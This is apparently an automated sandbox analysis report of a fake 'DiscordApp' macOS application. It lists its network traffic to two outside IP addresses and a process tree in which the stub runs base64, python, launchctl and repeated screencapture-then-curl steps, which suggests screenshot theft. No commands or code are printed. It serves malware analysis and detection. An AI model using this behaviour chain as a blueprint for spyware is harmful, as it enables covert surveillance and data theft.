Dez 12, 2018 11:25:50.561301947 MEZ4926180192.168.0.5037.1.221.204
Dez 12, 2018 11:25:51.254153967 MEZ492608080192.168.0.5037.1.221.204
Dez 12, 2018 11:25:51.573265076 MEZ4926180192.168.0.5037.1.221.204
Dez 12, 2018 11:25:52.576610088 MEZ4926180192.168.0.5037.1.221.204
Dez 12, 2018 11:25:53.588479996 MEZ4926180192.168.0.5037.1.221.204
Dez 12, 2018 11:25:54.824533939 MEZ4926280192.168.0.5037.1.221.204
Dez 12, 2018 11:25:55.840099096 MEZ4926280192.168.0.5037.1.221.204
Dez 12, 2018 11:25:56.762430906 MEZ492638080192.168.0.5037.1.221.204
Dez 12, 2018 11:25:56.863220930 MEZ4926280192.168.0.5037.1.221.204
Dez 12, 2018 11:25:57.771920919 MEZ492638080192.168.0.5037.1.221.204
Dez 12, 2018 11:25:57.873159885 MEZ4926280192.168.0.5037.1.221.204
Dez 12, 2018 11:25:58.776724100 MEZ492638080192.168.0.5037.1.221.204
Dez 12, 2018 11:25:58.876944065 MEZ4926280192.168.0.5037.1.221.204
Dez 12, 2018 11:25:59.777034044 MEZ492638080192.168.0.5037.1.221.204
Dez 12, 2018 11:25:59.877212048 MEZ4926280192.168.0.5037.1.221.204
Dez 12, 2018 11:26:00.804119110 MEZ492638080192.168.0.5037.1.221.204
Dez 12, 2018 11:26:00.899293900 MEZ4926480192.168.0.5037.1.221.204
Dez 12, 2018 11:26:01.813508987 MEZ492638080192.168.0.5037.1.221.204
Dez 12, 2018 11:26:01.902189970 MEZ4926480192.168.0.5037.1.221.204
Dez 12, 2018 11:26:02.912795067 MEZ4926480192.168.0.5037.1.221.204
Dez 12, 2018 11:26:03.829324961 MEZ492638080192.168.0.5037.1.221.204
Dez 12, 2018 11:26:03.919831038 MEZ4926480192.168.0.5037.1.221.204
Dez 12, 2018 11:26:04.927236080 MEZ4926480192.168.0.5037.1.221.204
Dez 12, 2018 11:26:05.932907104 MEZ4926480192.168.0.5037.1.221.204
Dez 12, 2018 11:26:07.321036100 MEZ4926580192.168.0.5037.1.221.204
Dez 12, 2018 11:26:07.347166061 MEZ492668080192.168.0.5037.1.221.204
Dez 12, 2018 11:26:08.330248117 MEZ4926580192.168.0.5037.1.221.204
Dez 12, 2018 11:26:08.355740070 MEZ492668080192.168.0.5037.1.221.204
Dez 12, 2018 11:26:09.331034899 MEZ4926580192.168.0.5037.1.221.204
Dez 12, 2018 11:26:09.356344938 MEZ492668080192.168.0.5037.1.221.204
Dez 12, 2018 11:26:10.347182989 MEZ4926580192.168.0.5037.1.221.204
Dez 12, 2018 11:26:10.371691942 MEZ492668080192.168.0.5037.1.221.204
Dez 12, 2018 11:26:11.351032972 MEZ4926580192.168.0.5037.1.221.204
Dez 12, 2018 11:26:11.375142097 MEZ492668080192.168.0.5037.1.221.204
Dez 12, 2018 11:26:12.365624905 MEZ4926580192.168.0.5037.1.221.204
Dez 12, 2018 11:26:12.390377998 MEZ492668080192.168.0.5037.1.221.204
Dez 12, 2018 11:26:13.665103912 MEZ4926780192.168.0.5037.1.221.204
Dez 12, 2018 11:26:14.680248022 MEZ4926780192.168.0.5037.1.221.204
Dez 12, 2018 11:26:15.683597088 MEZ4926780192.168.0.5037.1.221.204
Dez 12, 2018 11:26:16.692811966 MEZ4926780192.168.0.5037.1.221.204
Dez 12, 2018 11:26:17.622610092 MEZ492688080192.168.0.5037.1.221.204
Dez 12, 2018 11:26:17.712584972 MEZ4926780192.168.0.5037.1.221.204
Dez 12, 2018 11:26:18.624605894 MEZ492688080192.168.0.5037.1.221.204
Dez 12, 2018 11:26:18.714864969 MEZ4926780192.168.0.5037.1.221.204
Dez 12, 2018 11:26:19.640564919 MEZ492688080192.168.0.5037.1.221.204
Dez 12, 2018 11:26:20.031933069 MEZ4926980192.168.0.5037.1.221.204
Dez 12, 2018 11:26:20.665370941 MEZ492688080192.168.0.5037.1.221.204
Dez 12, 2018 11:26:21.036437988 MEZ4926980192.168.0.5037.1.221.204
Dez 12, 2018 11:26:21.674592972 MEZ492688080192.168.0.5037.1.221.204
Dez 12, 2018 11:26:22.047846079 MEZ4926980192.168.0.5037.1.221.204
Dez 12, 2018 11:26:22.677927971 MEZ492688080192.168.0.5037.1.221.204
Dez 12, 2018 11:26:23.050513983 MEZ4926980192.168.0.5037.1.221.204
Dez 12, 2018 11:26:24.062685013 MEZ4926980192.168.0.5037.1.221.204
Dez 12, 2018 11:26:25.065892935 MEZ4926980192.168.0.5037.1.221.204
Dez 12, 2018 11:26:26.214181900 MEZ4927080192.168.0.5037.1.221.204
Dez 12, 2018 11:26:27.222148895 MEZ4927080192.168.0.5037.1.221.204
Dez 12, 2018 11:26:28.122375965 MEZ492718080192.168.0.5037.1.221.204
Dez 12, 2018 11:26:28.246272087 MEZ4927080192.168.0.5037.1.221.204
Dez 12, 2018 11:26:29.136310101 MEZ492718080192.168.0.5037.1.221.204
Dez 12, 2018 11:26:29.259780884 MEZ4927080192.168.0.5037.1.221.204
Dez 12, 2018 11:26:30.140634060 MEZ492718080192.168.0.5037.1.221.204
Dez 12, 2018 11:26:30.263546944 MEZ4927080192.168.0.5037.1.221.204
Dez 12, 2018 11:26:31.155570984 MEZ492718080192.168.0.5037.1.221.204
Dez 12, 2018 11:26:31.277848005 MEZ4927080192.168.0.5037.1.221.204
Dez 12, 2018 11:26:32.156913996 MEZ492718080192.168.0.5037.1.221.204
Dez 12, 2018 11:26:32.466542959 MEZ4927280192.168.0.5037.1.221.204
Dez 12, 2018 11:26:33.479120970 MEZ4927280192.168.0.5037.1.221.204
Dez 12, 2018 11:26:34.485863924 MEZ4927280192.168.0.5037.1.221.204
Dez 12, 2018 11:26:35.488313913 MEZ4927280192.168.0.5037.1.221.204
Dez 12, 2018 11:26:36.503489971 MEZ4927280192.168.0.5037.1.221.204
Dez 12, 2018 11:26:37.505712032 MEZ4927280192.168.0.5037.1.221.204
Dez 12, 2018 11:26:38.501620054 MEZ492738080192.168.0.5037.1.221.204
Dez 12, 2018 11:26:38.838845015 MEZ4927480192.168.0.5037.1.221.204
Dez 12, 2018 11:26:39.526896000 MEZ492738080192.168.0.5037.1.221.204
Dez 12, 2018 11:26:39.843019962 MEZ4927480192.168.0.5037.1.221.204
Dez 12, 2018 11:26:40.539129972 MEZ492738080192.168.0.5037.1.221.204
Dez 12, 2018 11:26:40.855221033 MEZ4927480192.168.0.5037.1.221.204
Dez 12, 2018 11:26:41.546240091 MEZ492738080192.168.0.5037.1.221.204
Dez 12, 2018 11:26:41.861515045 MEZ4927480192.168.0.5037.1.221.204

ICMP Packets

TimestampSource IPDest IPChecksumCodeType
Dez 12, 2018 11:24:45.456010103 MEZ5.45.85.3192.168.0.50c0d9(Host unreachable)Destination Unreachable
Dez 12, 2018 11:24:45.456120014 MEZ5.45.85.3192.168.0.50c0d9(Host unreachable)Destination Unreachable
Dez 12, 2018 11:24:48.467768908 MEZ5.45.85.3192.168.0.50c0d9(Host unreachable)Destination Unreachable
Dez 12, 2018 11:24:48.467863083 MEZ5.45.85.3192.168.0.50c0d9(Host unreachable)Destination Unreachable
Dez 12, 2018 11:24:48.467906952 MEZ5.45.85.3192.168.0.50c0d9(Host unreachable)Destination Unreachable
Dez 12, 2018 11:24:48.467947006 MEZ5.45.85.3192.168.0.50c0d9(Host unreachable)Destination Unreachable
Dez 12, 2018 11:24:48.467989922 MEZ5.45.85.3192.168.0.50c0d9(Host unreachable)Destination Unreachable
Dez 12, 2018 11:24:48.468030930 MEZ5.45.85.3192.168.0.50c0d9(Host unreachable)Destination Unreachable
Dez 12, 2018 11:24:51.479783058 MEZ5.45.85.3192.168.0.50c0d9(Host unreachable)Destination Unreachable
Dez 12, 2018 11:24:51.479856968 MEZ5.45.85.3192.168.0.50c0d9(Host unreachable)Destination Unreachable
Dez 12, 2018 11:24:51.479907990 MEZ5.45.85.3192.168.0.50c0d9(Host unreachable)Destination Unreachable
Dez 12, 2018 11:24:54.784076929 MEZ5.45.85.3192.168.0.50c0d9(Host unreachable)Destination Unreachable
Dez 12, 2018 11:24:54.784153938 MEZ5.45.85.3192.168.0.50c0d9(Host unreachable)Destination Unreachable
Dez 12, 2018 11:24:54.784194946 MEZ5.45.85.3192.168.0.50c0d9(Host unreachable)Destination Unreachable
Dez 12, 2018 11:24:57.825927019 MEZ5.45.85.3192.168.0.50c0d9(Host unreachable)Destination Unreachable
Dez 12, 2018 11:24:57.825992107 MEZ5.45.85.3192.168.0.50c0d9(Host unreachable)Destination Unreachable
Dez 12, 2018 11:24:57.826033115 MEZ5.45.85.3192.168.0.50c0d9(Host unreachable)Destination Unreachable
Dez 12, 2018 11:25:00.885791063 MEZ5.45.85.3192.168.0.50c0d9(Host unreachable)Destination Unreachable
Dez 12, 2018 11:25:00.885879040 MEZ5.45.85.3192.168.0.50c0d9(Host unreachable)Destination Unreachable
Dez 12, 2018 11:25:00.885931969 MEZ5.45.85.3192.168.0.50c0d9(Host unreachable)Destination Unreachable
Dez 12, 2018 11:25:03.911897898 MEZ5.45.85.3192.168.0.50c0d9(Host unreachable)Destination Unreachable
Dez 12, 2018 11:25:03.911942959 MEZ5.45.85.3192.168.0.50c0d9(Host unreachable)Destination Unreachable
Dez 12, 2018 11:25:03.911962032 MEZ5.45.85.3192.168.0.50c0d9(Host unreachable)Destination Unreachable
Dez 12, 2018 11:25:07.271684885 MEZ5.45.85.3192.168.0.50c0d9(Host unreachable)Destination Unreachable
Dez 12, 2018 11:25:07.271769047 MEZ5.45.85.3192.168.0.50c0d9(Host unreachable)Destination Unreachable
Dez 12, 2018 11:25:07.271809101 MEZ5.45.85.3192.168.0.50c0d9(Host unreachable)Destination Unreachable
Dez 12, 2018 11:25:10.311420918 MEZ5.45.85.3192.168.0.50c0d9(Host unreachable)Destination Unreachable
Dez 12, 2018 11:25:10.311503887 MEZ5.45.85.3192.168.0.50c0d9(Host unreachable)Destination Unreachable
Dez 12, 2018 11:25:10.311546087 MEZ5.45.85.3192.168.0.50c0d9(Host unreachable)Destination Unreachable
Dez 12, 2018 11:25:13.440170050 MEZ5.45.85.3192.168.0.50c0d9(Host unreachable)Destination Unreachable
Dez 12, 2018 11:25:13.440263033 MEZ5.45.85.3192.168.0.50c0d9(Host unreachable)Destination Unreachable
Dez 12, 2018 11:25:13.440305948 MEZ5.45.85.3192.168.0.50c0d9(Host unreachable)Destination Unreachable
Dez 12, 2018 11:25:16.671509027 MEZ5.45.85.3192.168.0.50c0d9(Host unreachable)Destination Unreachable
Dez 12, 2018 11:25:16.671592951 MEZ5.45.85.3192.168.0.50c0d9(Host unreachable)Destination Unreachable
Dez 12, 2018 11:25:16.671633005 MEZ5.45.85.3192.168.0.50c0d9(Host unreachable)Destination Unreachable
Dez 12, 2018 11:25:16.671674967 MEZ5.45.85.3192.168.0.50c0d9(Host unreachable)Destination Unreachable
Dez 12, 2018 11:25:19.797471046 MEZ5.45.85.3192.168.0.50c0d9(Host unreachable)Destination Unreachable
Dez 12, 2018 11:25:19.797559977 MEZ5.45.85.3192.168.0.50c0d9(Host unreachable)Destination Unreachable
Dez 12, 2018 11:25:19.797605038 MEZ5.45.85.3192.168.0.50c0d9(Host unreachable)Destination Unreachable
Dez 12, 2018 11:25:22.805457115 MEZ5.45.85.3192.168.0.50c0d9(Host unreachable)Destination Unreachable
Dez 12, 2018 11:25:22.805547953 MEZ5.45.85.3192.168.0.50c0d9(Host unreachable)Destination Unreachable
Dez 12, 2018 11:25:22.805591106 MEZ5.45.85.3192.168.0.50c0d9(Host unreachable)Destination Unreachable
Dez 12, 2018 11:25:26.126349926 MEZ5.45.85.3192.168.0.50c0d9(Host unreachable)Destination Unreachable
Dez 12, 2018 11:25:26.126462936 MEZ5.45.85.3192.168.0.50c0d9(Host unreachable)Destination Unreachable
Dez 12, 2018 11:25:26.126507044 MEZ5.45.85.3192.168.0.50c0d9(Host unreachable)Destination Unreachable
Dez 12, 2018 11:25:29.155546904 MEZ5.45.85.3192.168.0.50c0d9(Host unreachable)Destination Unreachable
Dez 12, 2018 11:25:29.155633926 MEZ5.45.85.3192.168.0.50c0d9(Host unreachable)Destination Unreachable
Dez 12, 2018 11:25:29.155682087 MEZ5.45.85.3192.168.0.50c0d9(Host unreachable)Destination Unreachable
Dez 12, 2018 11:25:32.163817883 MEZ5.45.85.3192.168.0.50c0d9(Host unreachable)Destination Unreachable
Dez 12, 2018 11:25:32.163901091 MEZ5.45.85.3192.168.0.50c0d9(Host unreachable)Destination Unreachable
Dez 12, 2018 11:25:32.163945913 MEZ5.45.85.3192.168.0.50c0d9(Host unreachable)Destination Unreachable
Dez 12, 2018 11:25:35.521388054 MEZ5.45.85.3192.168.0.50c0d9(Host unreachable)Destination Unreachable
Dez 12, 2018 11:25:35.521486998 MEZ5.45.85.3192.168.0.50c0d9(Host unreachable)Destination Unreachable
Dez 12, 2018 11:25:35.521532059 MEZ5.45.85.3192.168.0.50c0d9(Host unreachable)Destination Unreachable
Dez 12, 2018 11:25:35.521579027 MEZ5.45.85.3192.168.0.50c0d9(Host unreachable)Destination Unreachable
Dez 12, 2018 11:25:38.859359980 MEZ5.45.85.3192.168.0.50c0d9(Host unreachable)Destination Unreachable
Dez 12, 2018 11:25:38.859483004 MEZ5.45.85.3192.168.0.50c0d9(Host unreachable)Destination Unreachable
Dez 12, 2018 11:25:38.859502077 MEZ5.45.85.3192.168.0.50c0d9(Host unreachable)Destination Unreachable
Dez 12, 2018 11:25:41.901403904 MEZ5.45.85.3192.168.0.50c0d9(Host unreachable)Destination Unreachable
Dez 12, 2018 11:25:41.901493073 MEZ5.45.85.3192.168.0.50c0d9(Host unreachable)Destination Unreachable
Dez 12, 2018 11:25:41.901540041 MEZ5.45.85.3192.168.0.50c0d9(Host unreachable)Destination Unreachable
Dez 12, 2018 11:25:45.235452890 MEZ5.45.85.3192.168.0.50c0d9(Host unreachable)Destination Unreachable
Dez 12, 2018 11:25:45.235534906 MEZ5.45.85.3192.168.0.50c0d9(Host unreachable)Destination Unreachable
Dez 12, 2018 11:25:45.235632896 MEZ5.45.85.3192.168.0.50c0d9(Host unreachable)Destination Unreachable
Dez 12, 2018 11:25:48.251316071 MEZ5.45.85.3192.168.0.50c0d9(Host unreachable)Destination Unreachable
Dez 12, 2018 11:25:48.251416922 MEZ5.45.85.3192.168.0.50c0d9(Host unreachable)Destination Unreachable
Dez 12, 2018 11:25:48.251452923 MEZ5.45.85.3192.168.0.50c0d9(Host unreachable)Destination Unreachable
Dez 12, 2018 11:25:51.511445045 MEZ5.45.85.3192.168.0.50c0d9(Host unreachable)Destination Unreachable
Dez 12, 2018 11:25:51.511545897 MEZ5.45.85.3192.168.0.50c0d9(Host unreachable)Destination Unreachable
Dez 12, 2018 11:25:51.511589050 MEZ5.45.85.3192.168.0.50c0d9(Host unreachable)Destination Unreachable
Dez 12, 2018 11:25:51.511631012 MEZ5.45.85.3192.168.0.50c0d9(Host unreachable)Destination Unreachable
Dez 12, 2018 11:25:54.527424097 MEZ5.45.85.3192.168.0.50c0d9(Host unreachable)Destination Unreachable
Dez 12, 2018 11:25:54.527448893 MEZ5.45.85.3192.168.0.50c0d9(Host unreachable)Destination Unreachable
Dez 12, 2018 11:25:54.527487993 MEZ5.45.85.3192.168.0.50c0d9(Host unreachable)Destination Unreachable
Dez 12, 2018 11:25:57.583729982 MEZ5.45.85.3192.168.0.50c0d9(Host unreachable)Destination Unreachable
Dez 12, 2018 11:25:57.583784103 MEZ5.45.85.3192.168.0.50c0d9(Host unreachable)Destination Unreachable
Dez 12, 2018 11:25:57.583827019 MEZ5.45.85.3192.168.0.50c0d9(Host unreachable)Destination Unreachable
Dez 12, 2018 11:26:00.591411114 MEZ5.45.85.3192.168.0.50c0d9(Host unreachable)Destination Unreachable
Dez 12, 2018 11:26:00.591490984 MEZ5.45.85.3192.168.0.50c0d9(Host unreachable)Destination Unreachable
Dez 12, 2018 11:26:00.591531992 MEZ5.45.85.3192.168.0.50c0d9(Host unreachable)Destination Unreachable
Dez 12, 2018 11:26:03.829421997 MEZ5.45.85.3192.168.0.50c0d9(Host unreachable)Destination Unreachable
Dez 12, 2018 11:26:03.829502106 MEZ5.45.85.3192.168.0.50c0d9(Host unreachable)Destination Unreachable
Dez 12, 2018 11:26:03.829546928 MEZ5.45.85.3192.168.0.50c0d9(Host unreachable)Destination Unreachable
Dez 12, 2018 11:26:06.853490114 MEZ5.45.85.3192.168.0.50c0d9(Host unreachable)Destination Unreachable
Dez 12, 2018 11:26:06.853574991 MEZ5.45.85.3192.168.0.50c0d9(Host unreachable)Destination Unreachable
Dez 12, 2018 11:26:06.853616953 MEZ5.45.85.3192.168.0.50c0d9(Host unreachable)Destination Unreachable
Dez 12, 2018 11:26:09.937520981 MEZ5.45.85.3192.168.0.50c0d9(Host unreachable)Destination Unreachable
Dez 12, 2018 11:26:09.937597036 MEZ5.45.85.3192.168.0.50c0d9(Host unreachable)Destination Unreachable
Dez 12, 2018 11:26:09.937638044 MEZ5.45.85.3192.168.0.50c0d9(Host unreachable)Destination Unreachable
Dez 12, 2018 11:26:13.371390104 MEZ5.45.85.3192.168.0.50c0d9(Host unreachable)Destination Unreachable
Dez 12, 2018 11:26:13.371475935 MEZ5.45.85.3192.168.0.50c0d9(Host unreachable)Destination Unreachable
Dez 12, 2018 11:26:13.371516943 MEZ5.45.85.3192.168.0.50c0d9(Host unreachable)Destination Unreachable
Dez 12, 2018 11:26:16.555367947 MEZ5.45.85.3192.168.0.50c0d9(Host unreachable)Destination Unreachable
Dez 12, 2018 11:26:16.555459023 MEZ5.45.85.3192.168.0.50c0d9(Host unreachable)Destination Unreachable
Dez 12, 2018 11:26:16.555500984 MEZ5.45.85.3192.168.0.50c0d9(Host unreachable)Destination Unreachable
Dez 12, 2018 11:26:19.709320068 MEZ5.45.85.3192.168.0.50c0d9(Host unreachable)Destination Unreachable
Dez 12, 2018 11:26:19.709431887 MEZ5.45.85.3192.168.0.50c0d9(Host unreachable)Destination Unreachable
Dez 12, 2018 11:26:19.709484100 MEZ5.45.85.3192.168.0.50c0d9(Host unreachable)Destination Unreachable
Dez 12, 2018 11:26:19.709523916 MEZ5.45.85.3192.168.0.50c0d9(Host unreachable)Destination Unreachable
Dez 12, 2018 11:26:22.828201056 MEZ5.45.85.3192.168.0.50c0d9(Host unreachable)Destination Unreachable
Dez 12, 2018 11:26:22.828304052 MEZ5.45.85.3192.168.0.50c0d9(Host unreachable)Destination Unreachable
Dez 12, 2018 11:26:22.828346968 MEZ5.45.85.3192.168.0.50c0d9(Host unreachable)Destination Unreachable
Dez 12, 2018 11:26:25.845690012 MEZ5.45.85.3192.168.0.50c0d9(Host unreachable)Destination Unreachable
Dez 12, 2018 11:26:25.845773935 MEZ5.45.85.3192.168.0.50c0d9(Host unreachable)Destination Unreachable
Dez 12, 2018 11:26:25.845815897 MEZ5.45.85.3192.168.0.50c0d9(Host unreachable)Destination Unreachable
Dez 12, 2018 11:26:28.957463026 MEZ5.45.85.3192.168.0.50c0d9(Host unreachable)Destination Unreachable
Dez 12, 2018 11:26:28.957550049 MEZ5.45.85.3192.168.0.50c0d9(Host unreachable)Destination Unreachable
Dez 12, 2018 11:26:28.957592964 MEZ5.45.85.3192.168.0.50c0d9(Host unreachable)Destination Unreachable
Dez 12, 2018 11:26:32.159317017 MEZ5.45.85.3192.168.0.50c0d9(Host unreachable)Destination Unreachable
Dez 12, 2018 11:26:32.159457922 MEZ5.45.85.3192.168.0.50c0d9(Host unreachable)Destination Unreachable
Dez 12, 2018 11:26:32.159498930 MEZ5.45.85.3192.168.0.50c0d9(Host unreachable)Destination Unreachable
Dez 12, 2018 11:26:35.181337118 MEZ5.45.85.3192.168.0.50c0d9(Host unreachable)Destination Unreachable
Dez 12, 2018 11:26:35.181428909 MEZ5.45.85.3192.168.0.50c0d9(Host unreachable)Destination Unreachable
Dez 12, 2018 11:26:35.181474924 MEZ5.45.85.3192.168.0.50c0d9(Host unreachable)Destination Unreachable
Dez 12, 2018 11:26:38.511331081 MEZ5.45.85.3192.168.0.50c0d9(Host unreachable)Destination Unreachable
Dez 12, 2018 11:26:38.511429071 MEZ5.45.85.3192.168.0.50c0d9(Host unreachable)Destination Unreachable
Dez 12, 2018 11:26:38.511470079 MEZ5.45.85.3192.168.0.50c0d9(Host unreachable)Destination Unreachable
Dez 12, 2018 11:26:41.527323961 MEZ5.45.85.3192.168.0.50c0d9(Host unreachable)Destination Unreachable
Dez 12, 2018 11:26:41.527403116 MEZ5.45.85.3192.168.0.50c0d9(Host unreachable)Destination Unreachable
Dez 12, 2018 11:26:41.527446985 MEZ5.45.85.3192.168.0.50c0d9(Host unreachable)Destination Unreachable
Dez 12, 2018 11:26:41.527484894 MEZ5.45.85.3192.168.0.50c0d9(Host unreachable)Destination Unreachable

System Behavior

Analysis Process: xpcproxy PID: 561 Parent PID: 1

General

Start time:11:24:38
Start date:12/12/2018
Path:/usr/libexec/xpcproxy
File size:43488 bytes
MD5 hash:d1bb9a4899f0af921e8188218b20d744

Chronological Activities

Analysis Process: Application Stub PID: 561 Parent PID: 1

General

Start time:11:24:38
Start date:12/12/2018
Path:/Users/henry/Desktop/unpack/DiscordApp.app/Contents/MacOS/Application Stub
File size:69308 bytes
MD5 hash:9c5867b717c3b80c525f4038ff075186

Chronological Activities

Analysis Process: bash PID: 563 Parent PID: 561

General

Start time:11:24:40
Start date:12/12/2018
Path:/bin/bash
File size:618448 bytes
MD5 hash:a17c5d0e7f7f4f69c6218066c2a3e1b6

Chronological Activities

Analysis Process: bash PID: 564 Parent PID: 563

General

Start time:11:24:40
Start date:12/12/2018
Path:/bin/bash
File size:618448 bytes
MD5 hash:a17c5d0e7f7f4f69c6218066c2a3e1b6

Chronological Activities

Analysis Process: bash PID: 565 Parent PID: 563

General

Start time:11:24:40
Start date:12/12/2018
Path:/bin/bash
File size:618448 bytes
MD5 hash:a17c5d0e7f7f4f69c6218066c2a3e1b6

Chronological Activities

Analysis Process: base64 PID: 565 Parent PID: 563

General

Start time:11:24:40
Start date:12/12/2018
Path:/usr/bin/base64
File size:23248 bytes
MD5 hash:718fe34e4012999c180f807fe323e7f1

Chronological Activities

Analysis Process: bash PID: 566 Parent PID: 563

General

Start time:11:24:40
Start date:12/12/2018
Path:/bin/bash
File size:618448 bytes
MD5 hash:a17c5d0e7f7f4f69c6218066c2a3e1b6

Chronological Activities

Analysis Process: python PID: 566 Parent PID: 563

General

Start time:11:24:40
Start date:12/12/2018
Path:/usr/bin/python
File size:66880 bytes
MD5 hash:2464fd41f7cf319d0e5c61a7643af77e

Chronological Activities

Analysis Process: Python PID: 566 Parent PID: 563

General

Start time:11:24:40
Start date:12/12/2018
Path:/System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python
File size:51744 bytes
MD5 hash:ba780ab677147d9db60c564ef3f51dd0

Chronological Activities

Analysis Process: Python PID: 572 Parent PID: 566

General

Start time:11:24:42
Start date:12/12/2018
Path:/System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python
File size:51744 bytes
MD5 hash:ba780ab677147d9db60c564ef3f51dd0

Chronological Activities

Analysis Process: sh PID: 572 Parent PID: 566

General

Start time:11:24:42
Start date:12/12/2018
Path:/bin/sh
File size:618512 bytes
MD5 hash:8aa60b22a5d30418a002b340989384dc

Chronological Activities

Analysis Process: mkdir PID: 572 Parent PID: 566

General

Start time:11:24:42
Start date:12/12/2018
Path:/bin/mkdir
File size:18592 bytes
MD5 hash:135a3b94b3d9efccb4c8cd23ac404571

Chronological Activities

Analysis Process: Python PID: 573 Parent PID: 566

General

Start time:11:24:42
Start date:12/12/2018
Path:/System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python
File size:51744 bytes
MD5 hash:ba780ab677147d9db60c564ef3f51dd0

Chronological Activities

Analysis Process: sh PID: 573 Parent PID: 566

General

Start time:11:24:42
Start date:12/12/2018
Path:/bin/sh
File size:618512 bytes
MD5 hash:8aa60b22a5d30418a002b340989384dc

Chronological Activities

Analysis Process: mkdir PID: 573 Parent PID: 566

General

Start time:11:24:42
Start date:12/12/2018
Path:/bin/mkdir
File size:18592 bytes
MD5 hash:135a3b94b3d9efccb4c8cd23ac404571

Chronological Activities

Analysis Process: Python PID: 574 Parent PID: 566

General

Start time:11:24:42
Start date:12/12/2018
Path:/System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python
File size:51744 bytes
MD5 hash:ba780ab677147d9db60c564ef3f51dd0

Chronological Activities

Analysis Process: sh PID: 574 Parent PID: 566

General

Start time:11:24:42
Start date:12/12/2018
Path:/bin/sh
File size:618512 bytes
MD5 hash:8aa60b22a5d30418a002b340989384dc

Chronological Activities

Analysis Process: launchctl PID: 574 Parent PID: 566

General

Start time:11:24:42
Start date:12/12/2018
Path:/bin/launchctl
File size:124656 bytes
MD5 hash:17fad4b994d600d0a5b6bc02b55c2c80

Chronological Activities

Analysis Process: Python PID: 576 Parent PID: 566

General

Start time:11:24:44
Start date:12/12/2018
Path:/System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python
File size:51744 bytes
MD5 hash:ba780ab677147d9db60c564ef3f51dd0

Chronological Activities

Analysis Process: sh PID: 576 Parent PID: 566

General

Start time:11:24:44
Start date:12/12/2018
Path:/bin/sh
File size:618512 bytes
MD5 hash:8aa60b22a5d30418a002b340989384dc

Chronological Activities

Analysis Process: sh PID: 578 Parent PID: 576

General

Start time:11:24:44
Start date:12/12/2018
Path:/bin/sh
File size:618512 bytes
MD5 hash:8aa60b22a5d30418a002b340989384dc

Chronological Activities

Analysis Process: ps PID: 578 Parent PID: 576

General

Start time:11:24:44
Start date:12/12/2018
Path:/bin/ps
File size:51280 bytes
MD5 hash:792e18b1417ac1f184680d2423206e4f

Chronological Activities

Analysis Process: sh PID: 580 Parent PID: 576

General

Start time:11:24:44
Start date:12/12/2018
Path:/bin/sh
File size:618512 bytes
MD5 hash:8aa60b22a5d30418a002b340989384dc

Chronological Activities

Analysis Process: grep PID: 580 Parent PID: 576

General

Start time:11:24:44
Start date:12/12/2018
Path:/usr/bin/grep
File size:33936 bytes
MD5 hash:2b3efb273296881708ea2914c612e0eb

Chronological Activities

Analysis Process: sh PID: 581 Parent PID: 576

General

Start time:11:24:44
Start date:12/12/2018
Path:/bin/sh
File size:618512 bytes
MD5 hash:8aa60b22a5d30418a002b340989384dc

Chronological Activities

Analysis Process: grep PID: 581 Parent PID: 576

General

Start time:11:24:44
Start date:12/12/2018
Path:/usr/bin/grep
File size:33936 bytes
MD5 hash:2b3efb273296881708ea2914c612e0eb

Chronological Activities

Analysis Process: bash PID: 567 Parent PID: 563

General

Start time:11:24:40
Start date:12/12/2018
Path:/bin/bash
File size:618448 bytes
MD5 hash:a17c5d0e7f7f4f69c6218066c2a3e1b6

Chronological Activities

Analysis Process: bash PID: 584 Parent PID: 563

General

Start time:11:24:44
Start date:12/12/2018
Path:/bin/bash
File size:618448 bytes
MD5 hash:a17c5d0e7f7f4f69c6218066c2a3e1b6

Chronological Activities

Analysis Process: screencapture PID: 584 Parent PID: 563

General

Start time:11:24:44
Start date:12/12/2018
Path:/usr/sbin/screencapture
File size:120496 bytes
MD5 hash:e35ea92c730c1c3a66fc3a14027729aa

Chronological Activities

Analysis Process: bash PID: 586 Parent PID: 563

General

Start time:11:24:45
Start date:12/12/2018
Path:/bin/bash
File size:618448 bytes
MD5 hash:a17c5d0e7f7f4f69c6218066c2a3e1b6

Chronological Activities

Analysis Process: curl PID: 586 Parent PID: 563

General

Start time:11:24:45
Start date:12/12/2018
Path:/usr/bin/curl
File size:185104 bytes
MD5 hash:078cd73f58d3d8f875eed22522ff73f7

Chronological Activities

Analysis Process: bash PID: 587 Parent PID: 563

General

Start time:11:24:50
Start date:12/12/2018
Path:/bin/bash
File size:618448 bytes
MD5 hash:a17c5d0e7f7f4f69c6218066c2a3e1b6

Chronological Activities

Analysis Process: screencapture PID: 587 Parent PID: 563

General

Start time:11:24:50
Start date:12/12/2018
Path:/usr/sbin/screencapture
File size:120496 bytes
MD5 hash:e35ea92c730c1c3a66fc3a14027729aa

Chronological Activities

Analysis Process: bash PID: 588 Parent PID: 563

General

Start time:11:24:50
Start date:12/12/2018
Path:/bin/bash
File size:618448 bytes
MD5 hash:a17c5d0e7f7f4f69c6218066c2a3e1b6

Chronological Activities

Analysis Process: curl PID: 588 Parent PID: 563

General

Start time:11:24:50
Start date:12/12/2018
Path:/usr/bin/curl
File size:185104 bytes
MD5 hash:078cd73f58d3d8f875eed22522ff73f7

Chronological Activities

Analysis Process: bash PID: 594 Parent PID: 563

General

Start time:11:24:57
Start date:12/12/2018
Path:/bin/bash
File size:618448 bytes
MD5 hash:a17c5d0e7f7f4f69c6218066c2a3e1b6

Chronological Activities

Analysis Process: screencapture PID: 594 Parent PID: 563

General

Start time:11:24:57
Start date:12/12/2018
Path:/usr/sbin/screencapture
File size:120496 bytes
MD5 hash:e35ea92c730c1c3a66fc3a14027729aa

Chronological Activities

Analysis Process: bash PID: 595 Parent PID: 563

General

Start time:11:24:57
Start date:12/12/2018
Path:/bin/bash
File size:618448 bytes
MD5 hash:a17c5d0e7f7f4f69c6218066c2a3e1b6

Chronological Activities

Analysis Process: curl PID: 595 Parent PID: 563

General

Start time:11:24:57
Start date:12/12/2018
Path:/usr/bin/curl
File size:185104 bytes
MD5 hash:078cd73f58d3d8f875eed22522ff73f7

Chronological Activities

Analysis Process: bash PID: 599 Parent PID: 563

General

Start time:11:25:03
Start date:12/12/2018
Path:/bin/bash
File size:618448 bytes
MD5 hash:a17c5d0e7f7f4f69c6218066c2a3e1b6

Chronological Activities

